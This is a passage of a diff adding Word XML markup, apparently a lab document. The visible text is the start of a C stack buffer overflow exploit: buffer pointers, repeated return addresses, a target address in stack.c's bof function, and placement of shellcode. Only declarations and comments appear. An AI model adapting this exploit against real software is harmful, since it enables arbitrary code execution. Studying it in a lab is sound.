+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 0;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    /* Pointer to buffer */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>char</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> *</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>ptr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    /* Long </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to handle a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>sucession</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>retptr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> addresses */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>long</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> *</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>addrptr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    /* Address to land us in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>stack.c's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>bof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> function</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>in</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> order to overwrite the return and send us to the exploit */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>long</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>retaddr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    /* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>num</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is a position </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>, used to place shell code plus null at end of buffer */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
